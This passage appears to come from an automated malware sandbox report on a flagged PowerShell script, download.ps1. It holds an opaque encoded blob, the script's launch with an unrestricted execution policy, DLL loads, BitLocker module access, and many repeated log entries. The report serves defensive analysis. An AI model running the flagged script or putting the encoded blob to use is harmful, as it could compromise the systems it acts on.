"dfF4YXU2djMzOJ3+ARVutgTxKWS3h/NmKTduF87sBYxvKGpFA4DaaKWKXjn0EFjs2BI59TlkyMiMz8f6MzDCTbNEZgimfcKEhOQDB4uh7+q41kwBlaSNg6y9uXyoRUKQh22n7srMjNrAN977FwGGkaDDj7i8vx9LxLXO3MtJgd/iwcXG4X23nkmNKMzc3S87VgWJi4/ahJzgn+fKxDSefApH+0jwd5/b0cBOGgvZ2eSg3yc6Foy5RmJRqS/IxUjJU98i1m/sSsrg2/hE58pttm3lpGg8H0wWh9v+hM2QatFFlJXgz/6oLoGFqujX70P7/9USedQxCAyRIPsf9l+k1JIvm4CG3alXVWbDztwhCxyyCMvzKMyvL9aQwP7jIm+zMrwqIqNFwy/xdGuICZLxJ+xFb0YBg1qIN838QNEgzM3hf2oucwSrFLMi4KolswkEGUQNmZHChOD4BlOUVj79Ak6QogCIIob0Mc837NDAYIVus16tZPfSGqHkEddY1HjXrTXxxAVdiO1s11vKx6FfhcNclflrXi6eXwGmv+FojEn7Tb53LacWyqCoxYL/4mgGvshqfitPtuJEMlNOQxwNyQUJ4G9V01lepGBmzy4tzS/NBMGOjrCVJl9avuXkiE2Lz7+8DsHqsQHv56P2qYCV6oa9tdxIR0KR1Wt+5pasLRxrTIR8KBQr+BmPWKPAVT7mdc2us2/vFIhU2h4OAF8Z1ga6D/oe4nGos3Lp9Qb+0+QaXW+gcB2RmsRE3QHLY3TyhEGTedaC2yAyzs2pbFZcJhSmCl4ajKCDfDGa3wRLXOU9R56Z92Ld0AS5b09wPjuLbnz3NOMo7M5hsaWFsDDsW8V4voMIZX+WxZabyZ4aVcu1OuF6kba64EPwJJGhWak0+YhUkJC58QyKgMzquf0/t8pKiNbu+9umZX371brYiOzWHw6Yu+fbDruZaQ0O5o3bFg8Gk7ZxAc3evw3qZZGpNvLVBx4azbXhBl2b0MWPNRTxFpfZ5OplrEorCIvMzMyUyakfPgvLkvjQZ21IZYK18DJaxdYPATb3gf5teZm400GtBR5ALX+pnLbR4VSQd996FACHj4NmmYxN2yBui28WSxa9L3wA8DugSyMxSRlyjs/sr08ZkJaa957Ftpdo1g1wiMBiEkC65d7vfxSzIV9/mZQN4dRITx/KNObtHorOnTRw+/GaEwTOjonXS8vAAvRsoKs5eiddcJY/cWxdsOgWM8XbLyfuSFIIakG70PIuoVBaVeZtQraa/lQCHBDhuQLbAjPpoPuiI5vRJzA7/KYi1BXfaMeCXM57yERROW+7yq9UFnQFn46YQln2EodDVq0OvRvxfcaoH6NnkVxlDKLj5cZpBALTkEXVBe+18HsFZ5xzeMIhRzPQc81QR6vZqwyDOQ/p0JwFySnw19wBA7HsJGzi4nNWk11RoYbaFds2XtOtjiYCmN/BVBC/V+nVeFkkMvHxHfBvWmgQUFYR+BFuo7UgkCd7O8U/FfbTTkiDS4hgsBJLXy9NJJyf5HRmL//Gqjvwbno0qmUPcsjwsuJe0a9l7lgYuze3x2mXQXOf/IlUG/rsYhLxXktWGU2xmxXq3O6i0qhSNq5KvtYVT1pVZS9hHuYHuyJQ7Ty6iiGQtAAhIBSUYlFLGpfJnnmy+9q/QLskqbViw2j3ehC6QAY6Uo1QwfeApPnr9i8vBmq4Klq/zb9mVCJR3MRFxyAjOXJlH4fpRrRsvP5hD/LcrZPBLs3REjSC/qGHSJ7Gkl2fxLMFAKT4VjzaAzheo7sFuWfJeciVWaKiHLcSq6NsXjpyrJnuvfq8dNxu2jtrMl6hE8wP94aNYb2Iay+mCuCju/V5ckCiM9K/7ht9CFJ9sAc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.1649210717.0000019EEBF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1655104347.0000019EEE2C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1655676223.0000019EEE33E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb! source: powershell.exe, 00000000.00000002.1655676223.0000019EEE33E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb6 source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 00000000.00000002.1649210717.0000019EEBF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1655104347.0000019EEE2C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.1654074378.0000019EEE227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbpp source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1654074378.0000019EEE250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdblC source: powershell.exe, 00000000.00000002.1655676223.0000019EEE386000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA33F6D2A5 pushad ; iretd 0_2_00007FFA33F6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA340800BD pushad ; iretd 0_2_00007FFA340800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34087918 push ebx; retf 0_2_00007FFA3408794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34082313 pushad ; iretd 0_2_00007FFA3408232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA34303DEC push eax; iretd 0_2_00007FFA34303DED

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
